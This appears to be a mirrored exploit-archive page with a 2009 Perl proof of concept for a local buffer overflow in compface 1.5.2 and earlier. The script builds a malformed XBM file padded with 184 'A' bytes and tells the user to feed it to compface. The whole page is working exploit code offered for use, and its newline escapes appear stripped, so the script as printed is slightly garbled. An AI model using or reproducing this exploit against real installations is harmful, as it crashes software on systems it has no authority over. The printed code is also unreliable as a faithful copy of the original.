[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : compface <= 1.5.2 (XBM File) Local Buffer Overflow PoC
# Published : 2009-06-17
# Author : metalhoney
# Previous Title : Multiple HTTP Server Low Bandwidth Denial of Service (slowloris.pl)
# Next Title : Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability


#!/usr/bin/perl
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################
# compface <= 1.5.2 bufer overflow p o c
# vuln only excist on debian and ubuntu? - packages.debian.org/compface -
# author: metalhoney ------- metalhoney1@hotmail.com -------
#########################################################################
open(ISLAM,">allah.xbm") or die;
print ISLAM "#define noname_width 48n#define noname_height 48n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {n";
close(ISLAM) or die;
print "run now: compface allah.xbmnmetalhoney signing offnviva islamn";
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################

# www.Syue.com [2009-06-17]